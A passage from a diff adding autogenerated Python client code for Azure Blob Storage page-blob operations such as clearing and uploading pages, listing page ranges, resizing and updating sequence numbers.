kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + comp = kwargs.pop('comp', "page") # type: str + page_write = kwargs.pop('page_write', "clear") # type: str + + _lease_id = None + _encryption_key = None + _encryption_key_sha256 = None + _encryption_algorithm = None + _encryption_scope = None + _if_sequence_number_less_than_or_equal_to = None + _if_sequence_number_less_than = None + _if_sequence_number_equal_to = None + _if_modified_since = None + _if_unmodified_since = None + _if_match = None + _if_none_match = None + _if_tags = None + if lease_access_conditions is not None: + _lease_id = lease_access_conditions.lease_id + if cpk_info is not None: + _encryption_key = cpk_info.encryption_key + _encryption_key_sha256 = cpk_info.encryption_key_sha256 + _encryption_algorithm = cpk_info.encryption_algorithm + if cpk_scope_info is not None: + _encryption_scope = cpk_scope_info.encryption_scope + if sequence_number_access_conditions is not None: + _if_sequence_number_less_than_or_equal_to = sequence_number_access_conditions.if_sequence_number_less_than_or_equal_to + _if_sequence_number_less_than = sequence_number_access_conditions.if_sequence_number_less_than + _if_sequence_number_equal_to = sequence_number_access_conditions.if_sequence_number_equal_to + if modified_access_conditions is not None: + _if_modified_since = modified_access_conditions.if_modified_since + _if_unmodified_since = modified_access_conditions.if_unmodified_since + _if_match = modified_access_conditions.if_match + _if_none_match = modified_access_conditions.if_none_match + _if_tags = modified_access_conditions.if_tags + + request = build_clear_pages_request( + url=self._config.url, + comp=comp, + page_write=page_write, + version=self._config.version, + content_length=content_length, + timeout=timeout, + range=range, + lease_id=_lease_id, + encryption_key=_encryption_key, + encryption_key_sha256=_encryption_key_sha256, + encryption_algorithm=_encryption_algorithm, + encryption_scope=_encryption_scope, + if_sequence_number_less_than_or_equal_to=_if_sequence_number_less_than_or_equal_to, + if_sequence_number_less_than=_if_sequence_number_less_than, + if_sequence_number_equal_to=_if_sequence_number_equal_to, + if_modified_since=_if_modified_since, + if_unmodified_since=_if_unmodified_since, + if_match=_if_match, + if_none_match=_if_none_match, + if_tags=_if_tags, + request_id_parameter=request_id_parameter, + template_url=self.clear_pages.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [201]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['ETag']=self._deserialize('str', response.headers.get('ETag')) + response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified')) + response_headers['Content-MD5']=self._deserialize('bytearray', response.headers.get('Content-MD5')) + response_headers['x-ms-content-crc64']=self._deserialize('bytearray', response.headers.get('x-ms-content-crc64')) + response_headers['x-ms-blob-sequence-number']=self._deserialize('long', response.headers.get('x-ms-blob-sequence-number')) + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + clear_pages.metadata = {'url': "{url}/{containerName}/{blob}"} # type: ignore + + + @distributed_trace + def upload_pages_from_url( # pylint: disable=inconsistent-return-statements + self, + source_url, # type: str + source_range, # type: str + content_length, # type: int + range, # type: str + source_content_md5=None, # type: Optional[bytearray] + source_contentcrc64=None, # type: Optional[bytearray] + timeout=None, # type: Optional[int] + request_id_parameter=None, # type: Optional[str] + copy_source_authorization=None, # type: Optional[str] + cpk_info=None, # type: Optional["_models.CpkInfo"] + cpk_scope_info=None, # type: Optional["_models.CpkScopeInfo"] + lease_access_conditions=None, # type: Optional["_models.LeaseAccessConditions"] + sequence_number_access_conditions=None, # type: Optional["_models.SequenceNumberAccessConditions"] + modified_access_conditions=None, # type: Optional["_models.ModifiedAccessConditions"] + source_modified_access_conditions=None, # type: Optional["_models.SourceModifiedAccessConditions"] + **kwargs # type: Any + ): + # type: (...) -> None + """The Upload Pages operation writes a range of pages to a page blob where the contents are read + from a URL. + + :param source_url: Specify a URL to the copy source. + :type source_url: str + :param source_range: Bytes of source data in the specified range. The length of this range + should match the ContentLength header and x-ms-range/Range destination range header. + :type source_range: str + :param content_length: The length of the request. + :type content_length: long + :param range: The range of bytes to which the source range would be written. The range should + be 512 aligned and range-end is required. + :type range: str + :param source_content_md5: Specify the md5 calculated for the range of bytes that must be read + from the copy source. Default value is None. + :type source_content_md5: bytearray + :param source_contentcrc64: Specify the crc64 calculated for the range of bytes that must be + read from the copy source. Default value is None. + :type source_contentcrc64: bytearray + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param copy_source_authorization: Only Bearer type is supported. Credentials should be a valid + OAuth access token to copy source. Default value is None. + :type copy_source_authorization: str + :param cpk_info: Parameter group. Default value is None. + :type cpk_info: ~azure.storage.blob.models.CpkInfo + :param cpk_scope_info: Parameter group. Default value is None. + :type cpk_scope_info: ~azure.storage.blob.models.CpkScopeInfo + :param lease_access_conditions: Parameter group. Default value is None. + :type lease_access_conditions: ~azure.storage.blob.models.LeaseAccessConditions + :param sequence_number_access_conditions: Parameter group. Default value is None. + :type sequence_number_access_conditions: + ~azure.storage.blob.models.SequenceNumberAccessConditions + :param modified_access_conditions: Parameter group. Default value is None. + :type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions + :param source_modified_access_conditions: Parameter group. Default value is None. + :type source_modified_access_conditions: + ~azure.storage.blob.models.SourceModifiedAccessConditions + :keyword comp: comp. Default value is "page". Note that overriding this default value may + result in unsupported behavior. + :paramtype comp: str + :keyword page_write: Required. You may specify one of the following options: + + + * Update: Writes the bytes specified by the request body into the specified range. The Range + and Content-Length headers must match to perform the update. + * Clear: Clears the specified range and releases the space used in storage for that range. To + clear a range, set the Content-Length header to zero, and the Range header to a value that + indicates the range to clear, up to maximum blob size. Default value is "update". Note that + overriding this default value may result in unsupported behavior. + :paramtype page_write: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + comp = kwargs.pop('comp', "page") # type: str + page_write = kwargs.pop('page_write', "update") # type: str + + _encryption_key = None + _encryption_key_sha256 = None + _encryption_algorithm = None + _encryption_scope = None + _lease_id = None + _if_sequence_number_less_than_or_equal_to = None + _if_sequence_number_less_than = None + _if_sequence_number_equal_to = None + _if_modified_since = None + _if_unmodified_since = None + _if_match = None + _if_none_match = None + _if_tags = None + _source_if_modified_since = None + _source_if_unmodified_since = None + _source_if_match = None + _source_if_none_match = None + if cpk_info is not None: + _encryption_key = cpk_info.encryption_key + _encryption_key_sha256 = cpk_info.encryption_key_sha256 + _encryption_algorithm = cpk_info.encryption_algorithm + if cpk_scope_info is not None: + _encryption_scope = cpk_scope_info.encryption_scope + if lease_access_conditions is not None: + _lease_id = lease_access_conditions.lease_id + if sequence_number_access_conditions is not None: + _if_sequence_number_less_than_or_equal_to = sequence_number_access_conditions.if_sequence_number_less_than_or_equal_to + _if_sequence_number_less_than = sequence_number_access_conditions.if_sequence_number_less_than + _if_sequence_number_equal_to = sequence_number_access_conditions.if_sequence_number_equal_to + if modified_access_conditions is not None: + _if_modified_since = modified_access_conditions.if_modified_since + _if_unmodified_since = modified_access_conditions.if_unmodified_since + _if_match = modified_access_conditions.if_match + _if_none_match = modified_access_conditions.if_none_match + _if_tags = modified_access_conditions.if_tags + if source_modified_access_conditions is not None: + _source_if_modified_since = source_modified_access_conditions.source_if_modified_since + _source_if_unmodified_since = source_modified_access_conditions.source_if_unmodified_since + _source_if_match = source_modified_access_conditions.source_if_match + _source_if_none_match = source_modified_access_conditions.source_if_none_match + + request = build_upload_pages_from_url_request( + url=self._config.url, + comp=comp, + page_write=page_write, + version=self._config.version, + source_url=source_url, + source_range=source_range, + content_length=content_length, + range=range, + source_content_md5=source_content_md5, + source_contentcrc64=source_contentcrc64, + timeout=timeout, + encryption_key=_encryption_key, + encryption_key_sha256=_encryption_key_sha256, + encryption_algorithm=_encryption_algorithm, + encryption_scope=_encryption_scope, + lease_id=_lease_id, + if_sequence_number_less_than_or_equal_to=_if_sequence_number_less_than_or_equal_to, + if_sequence_number_less_than=_if_sequence_number_less_than, + if_sequence_number_equal_to=_if_sequence_number_equal_to, + if_modified_since=_if_modified_since, + if_unmodified_since=_if_unmodified_since, + if_match=_if_match, + if_none_match=_if_none_match, + if_tags=_if_tags, + source_if_modified_since=_source_if_modified_since, + source_if_unmodified_since=_source_if_unmodified_since, + source_if_match=_source_if_match, + source_if_none_match=_source_if_none_match, + request_id_parameter=request_id_parameter, + copy_source_authorization=copy_source_authorization, + template_url=self.upload_pages_from_url.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [201]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['ETag']=self._deserialize('str', response.headers.get('ETag')) + response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified')) + response_headers['Content-MD5']=self._deserialize('bytearray', response.headers.get('Content-MD5')) + response_headers['x-ms-content-crc64']=self._deserialize('bytearray', response.headers.get('x-ms-content-crc64')) + response_headers['x-ms-blob-sequence-number']=self._deserialize('long', response.headers.get('x-ms-blob-sequence-number')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + response_headers['x-ms-request-server-encrypted']=self._deserialize('bool', response.headers.get('x-ms-request-server-encrypted')) + response_headers['x-ms-encryption-key-sha256']=self._deserialize('str', response.headers.get('x-ms-encryption-key-sha256')) + response_headers['x-ms-encryption-scope']=self._deserialize('str', response.headers.get('x-ms-encryption-scope')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + upload_pages_from_url.metadata = {'url': "{url}/{containerName}/{blob}"} # type: ignore + + + @distributed_trace + def get_page_ranges( + self, + snapshot=None, # type: Optional[str] + timeout=None, # type: Optional[int] + range=None, # type: Optional[str] + request_id_parameter=None, # type: Optional[str] + marker=None, # type: Optional[str] + maxresults=None, # type: Optional[int] + lease_access_conditions=None, # type: Optional["_models.LeaseAccessConditions"] + modified_access_conditions=None, # type: Optional["_models.ModifiedAccessConditions"] + **kwargs # type: Any + ): + # type: (...) -> "_models.PageList" + """The Get Page Ranges operation returns the list of valid page ranges for a page blob or snapshot + of a page blob. + + :param snapshot: The snapshot parameter is an opaque DateTime value that, when present, + specifies the blob snapshot to retrieve. For more information on working with blob snapshots, + see :code:`Creating + a Snapshot of a Blob.`. Default value is None. + :type snapshot: str + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param range: Return only the bytes of the blob in the specified range. Default value is None. + :type range: str + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param marker: A string value that identifies the portion of the list of containers to be + returned with the next listing operation. The operation returns the NextMarker value within the + response body if the listing operation did not return all containers remaining to be listed + with the current page. The NextMarker value can be used as the value for the marker parameter + in a subsequent call to request the next page of list items. The marker value is opaque to the + client. Default value is None. + :type marker: str + :param maxresults: Specifies the maximum number of containers to return. If the request does + not specify maxresults, or specifies a value greater than 5000, the server will return up to + 5000 items. Note that if the listing operation crosses a partition boundary, then the service + will return a continuation token for retrieving the remainder of the results. For this reason, + it is possible that the service will return fewer results than specified by maxresults, or than + the default of 5000. Default value is None. + :type maxresults: int + :param lease_access_conditions: Parameter group. Default value is None. + :type lease_access_conditions: ~azure.storage.blob.models.LeaseAccessConditions + :param modified_access_conditions: Parameter group. Default value is None. + :type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions + :keyword comp: comp. Default value is "pagelist". Note that overriding this default value may + result in unsupported behavior. + :paramtype comp: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: PageList, or the result of cls(response) + :rtype: ~azure.storage.blob.models.PageList + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType["_models.PageList"] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + comp = kwargs.pop('comp', "pagelist") # type: str + + _lease_id = None + _if_modified_since = None + _if_unmodified_since = None + _if_match = None + _if_none_match = None + _if_tags = None + if lease_access_conditions is not None: + _lease_id = lease_access_conditions.lease_id + if modified_access_conditions is not None: + _if_modified_since = modified_access_conditions.if_modified_since + _if_unmodified_since = modified_access_conditions.if_unmodified_since + _if_match = modified_access_conditions.if_match + _if_none_match = modified_access_conditions.if_none_match + _if_tags = modified_access_conditions.if_tags + + request = build_get_page_ranges_request( + url=self._config.url, + comp=comp, + version=self._config.version, + snapshot=snapshot, + timeout=timeout, + range=range, + lease_id=_lease_id, + if_modified_since=_if_modified_since, + if_unmodified_since=_if_unmodified_since, + if_match=_if_match, + if_none_match=_if_none_match, + if_tags=_if_tags, + request_id_parameter=request_id_parameter, + marker=marker, + maxresults=maxresults, + template_url=self.get_page_ranges.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [200]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified')) + response_headers['ETag']=self._deserialize('str', response.headers.get('ETag')) + response_headers['x-ms-blob-content-length']=self._deserialize('long', response.headers.get('x-ms-blob-content-length')) + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + + deserialized = self._deserialize('PageList', pipeline_response) + + if cls: + return cls(pipeline_response, deserialized, response_headers) + + return deserialized + + get_page_ranges.metadata = {'url': "{url}/{containerName}/{blob}"} # type: ignore + + + @distributed_trace + def get_page_ranges_diff( + self, + snapshot=None, # type: Optional[str] + timeout=None, # type: Optional[int] + prevsnapshot=None, # type: Optional[str] + prev_snapshot_url=None, # type: Optional[str] + range=None, # type: Optional[str] + request_id_parameter=None, # type: Optional[str] + marker=None, # type: Optional[str] + maxresults=None, # type: Optional[int] + lease_access_conditions=None, # type: Optional["_models.LeaseAccessConditions"] + modified_access_conditions=None, # type: Optional["_models.ModifiedAccessConditions"] + **kwargs # type: Any + ): + # type: (...) -> "_models.PageList" + """The Get Page Ranges Diff operation returns the list of valid page ranges for a page blob that + were changed between target blob and previous snapshot. + + :param snapshot: The snapshot parameter is an opaque DateTime value that, when present, + specifies the blob snapshot to retrieve. For more information on working with blob snapshots, + see :code:`Creating + a Snapshot of a Blob.`. Default value is None. + :type snapshot: str + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param prevsnapshot: Optional in version 2015-07-08 and newer. The prevsnapshot parameter is a + DateTime value that specifies that the response will contain only pages that were changed + between target blob and previous snapshot. Changed pages include both updated and cleared + pages. The target blob may be a snapshot, as long as the snapshot specified by prevsnapshot is + the older of the two. Note that incremental snapshots are currently supported only for blobs + created on or after January 1, 2016. Default value is None. + :type prevsnapshot: str + :param prev_snapshot_url: Optional. This header is only supported in service versions + 2019-04-19 and after and specifies the URL of a previous snapshot of the target blob. The + response will only contain pages that were changed between the target blob and its previous + snapshot. Default value is None. + :type prev_snapshot_url: str + :param range: Return only the bytes of the blob in the specified range. Default value is None. + :type range: str + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param marker: A string value that identifies the portion of the list of containers to be + returned with the next listing operation. The operation returns the NextMarker value within the + response body if the listing operation did not return all containers remaining to be listed + with the current page. The NextMarker value can be used as the value for the marker parameter + in a subsequent call to request the next page of list items. The marker value is opaque to the + client. Default value is None. + :type marker: str + :param maxresults: Specifies the maximum number of containers to return. If the request does + not specify maxresults, or specifies a value greater than 5000, the server will return up to + 5000 items. Note that if the listing operation crosses a partition boundary, then the service + will return a continuation token for retrieving the remainder of the results. For this reason, + it is possible that the service will return fewer results than specified by maxresults, or than + the default of 5000. Default value is None. + :type maxresults: int + :param lease_access_conditions: Parameter group. Default value is None. + :type lease_access_conditions: ~azure.storage.blob.models.LeaseAccessConditions + :param modified_access_conditions: Parameter group. Default value is None. + :type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions + :keyword comp: comp. Default value is "pagelist". Note that overriding this default value may + result in unsupported behavior. + :paramtype comp: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: PageList, or the result of cls(response) + :rtype: ~azure.storage.blob.models.PageList + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType["_models.PageList"] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + comp = kwargs.pop('comp', "pagelist") # type: str + + _lease_id = None + _if_modified_since = None + _if_unmodified_since = None + _if_match = None + _if_none_match = None + _if_tags = None + if lease_access_conditions is not None: + _lease_id = lease_access_conditions.lease_id + if modified_access_conditions is not None: + _if_modified_since = modified_access_conditions.if_modified_since + _if_unmodified_since = modified_access_conditions.if_unmodified_since + _if_match = modified_access_conditions.if_match + _if_none_match = modified_access_conditions.if_none_match + _if_tags = modified_access_conditions.if_tags + + request = build_get_page_ranges_diff_request( + url=self._config.url, + comp=comp, + version=self._config.version, + snapshot=snapshot, + timeout=timeout, + prevsnapshot=prevsnapshot, + prev_snapshot_url=prev_snapshot_url, + range=range, + lease_id=_lease_id, + if_modified_since=_if_modified_since, + if_unmodified_since=_if_unmodified_since, + if_match=_if_match, + if_none_match=_if_none_match, + if_tags=_if_tags, + request_id_parameter=request_id_parameter, + marker=marker, + maxresults=maxresults, + template_url=self.get_page_ranges_diff.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [200]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified')) + response_headers['ETag']=self._deserialize('str', response.headers.get('ETag')) + response_headers['x-ms-blob-content-length']=self._deserialize('long', response.headers.get('x-ms-blob-content-length')) + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + + deserialized = self._deserialize('PageList', pipeline_response) + + if cls: + return cls(pipeline_response, deserialized, response_headers) + + return deserialized + + get_page_ranges_diff.metadata = {'url': "{url}/{containerName}/{blob}"} # type: ignore + + + @distributed_trace + def resize( # pylint: disable=inconsistent-return-statements + self, + blob_content_length, # type: int + timeout=None, # type: Optional[int] + request_id_parameter=None, # type: Optional[str] + lease_access_conditions=None, # type: Optional["_models.LeaseAccessConditions"] + cpk_info=None, # type: Optional["_models.CpkInfo"] + cpk_scope_info=None, # type: Optional["_models.CpkScopeInfo"] + modified_access_conditions=None, # type: Optional["_models.ModifiedAccessConditions"] + **kwargs # type: Any + ): + # type: (...) -> None + """Resize the Blob. + + :param blob_content_length: This header specifies the maximum size for the page blob, up to 1 + TB. The page blob size must be aligned to a 512-byte boundary. + :type blob_content_length: long + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param lease_access_conditions: Parameter group. Default value is None. + :type lease_access_conditions: ~azure.storage.blob.models.LeaseAccessConditions + :param cpk_info: Parameter group. Default value is None. + :type cpk_info: ~azure.storage.blob.models.CpkInfo + :param cpk_scope_info: Parameter group. Default value is None. + :type cpk_scope_info: ~azure.storage.blob.models.CpkScopeInfo + :param modified_access_conditions: Parameter group. Default value is None. + :type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions + :keyword comp: comp. Default value is "properties". Note that overriding this default value may + result in unsupported behavior. + :paramtype comp: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + comp = kwargs.pop('comp', "properties") # type: str + + _lease_id = None + _encryption_key = None + _encryption_key_sha256 = None + _encryption_algorithm = None + _encryption_scope = None + _if_modified_since = None + _if_unmodified_since = None + _if_match = None + _if_none_match = None + _if_tags = None + if lease_access_conditions is not None: + _lease_id = lease_access_conditions.lease_id + if cpk_info is not None: + _encryption_key = cpk_info.encryption_key + _encryption_key_sha256 = cpk_info.encryption_key_sha256 + _encryption_algorithm = cpk_info.encryption_algorithm + if cpk_scope_info is not None: + _encryption_scope = cpk_scope_info.encryption_scope + if modified_access_conditions is not None: + _if_modified_since = modified_access_conditions.if_modified_since + _if_unmodified_since = modified_access_conditions.if_unmodified_since + _if_match = modified_access_conditions.if_match + _if_none_match = modified_access_conditions.if_none_match + _if_tags = modified_access_conditions.if_tags + + request = build_resize_request( + url=self._config.url, + comp=comp, + version=self._config.version, + blob_content_length=blob_content_length, + timeout=timeout, + lease_id=_lease_id, + encryption_key=_encryption_key, + encryption_key_sha256=_encryption_key_sha256, + encryption_algorithm=_encryption_algorithm, + encryption_scope=_encryption_scope, + if_modified_since=_if_modified_since, + if_unmodified_since=_if_unmodified_since, + if_match=_if_match, + if_none_match=_if_none_match, + if_tags=_if_tags, + request_id_parameter=request_id_parameter, + template_url=self.resize.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [200]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['ETag']=self._deserialize('str', response.headers.get('ETag')) + response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified')) + response_headers['x-ms-blob-sequence-number']=self._deserialize('long', response.headers.get('x-ms-blob-sequence-number')) + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + resize.metadata = {'url': "{url}/{containerName}/{blob}"} # type: ignore + + + @distributed_trace + def update_sequence_number( # pylint: disable=inconsistent-return-statements + self, + sequence_number_action, # type: Union[str, "_models.SequenceNumberActionType"] + timeout=None, # type: Optional[int] + blob_sequence_number=0, # type: Optional[int] + request_id_parameter=None, # type: Optional[str] + lease_access_conditions=None, # type: Optional["_models.LeaseAccessConditions"] + modified_access_conditions=None, # type: Optional["_models.ModifiedAccessConditions"] + **kwargs # type: Any + ): + # type: (...) -> None + """Update the sequence number of the blob. + + :param sequence_number_action: Required if the x-ms-blob-sequence-number header is set for the + request. This property applies to page blobs only. This property indicates how the service + should modify the blob's sequence number. + :type sequence_number_action: str or ~azure.storage.blob.models.SequenceNumberActionType + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param blob_sequence_number: Set for page blobs only. The sequence number is a user-controlled + value that you can use to track requests. The value of the sequence number must be between 0 + and 2^63 - 1. Default value is 0. + :type blob_sequence_number: long + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param lease_access_conditions: Parameter group. Default value is None. + :type lease_access_conditions: ~azure.storage.blob.models.LeaseAccessConditions + :param modified_access_conditions: Parameter group. Default value is None. + :type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions + :keyword comp: comp. Default value is "properties". Note that overriding this default value may + result in unsupported behavior. + :paramtype comp: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + comp = kwargs.pop('comp', "properties") # type: str + + _lease_id = None + _if_modified_since = None + _if_unmodified_since = None + _if_match = None + _if_none_match = None + _if_tags = None + if lease_access_conditions is not None: + _lease_id = lease_access_conditions.lease_id + if modified_access_conditions is not None: + _if_modified_since = modified_access_conditions.if_modified_since + _if_unmodified_since = modified_access_conditions.if_unmodified_since + _if_match = modified_access_conditions.if_match + _if_none_match = modified_access_conditions.if_none_match + _if_tags = modified_access_conditions.if_tags + + request = build_update_sequence_number_request( + url=self._config.url, + comp=comp, + version=self._config.version, + sequence_number_action=sequence_number_action, + timeout=timeout, + lease_id=_lease_id, + if_modified_since=_if_modified_since, + if_unmodified_since=_if_unmodified_since, + if_match=_if_match, + if_none_match=_if_none_match, + if_tags=_if_tags, + blob_sequence_number=blob_sequence_number, + request_id_parameter=request_id_parameter, + template_url=self.update_sequence_number.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [200]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['ETag']=self._deserialize('str', response.headers.get('ETag')) + response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified')) + response_headers['x-ms-blob-sequence-number']=self._deserialize('long', response.headers.get('x-ms-blob-sequence-number')) + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + update_sequence_number.metadata = {'url': "{url}/{containerName}/{blob}"} # type: ignore + + + @distributed_trace + def copy_incremental( # pylint: disable=inconsistent-return-statements + self, + copy_source, # type: str + timeout=None, # type: Optional[int] + request_id_parameter=None, # type: Optional[str] + modified_access_conditions=None, # type: Optional["_models.ModifiedAccessConditions"] + **kwargs # type: Any + ): + # type: (...) -> None + """The Copy Incremental operation copies a snapshot of the source page blob to a destination page + blob. The snapshot is copied such that only the differential changes between the previously + copied snapshot are transferred to the destination. The copied snapshots are complete copies of + the original snapshot and can be read or copied from as usual. This API is supported since REST + version 2016-05-31. + + :param copy_source: Specifies the name of the source page blob snapshot. This value is a URL of + up to 2 KB in length that specifies a page blob snapshot. The value should be URL-encoded as it + would appear in a request URI. The source blob must either be public or must be authenticated + via a shared access signature. + :type copy_source: str + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param modified_access_conditions: Parameter group. Default value is None. + :type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions + :keyword comp: comp. Default value is "incrementalcopy". Note that overriding this default + value 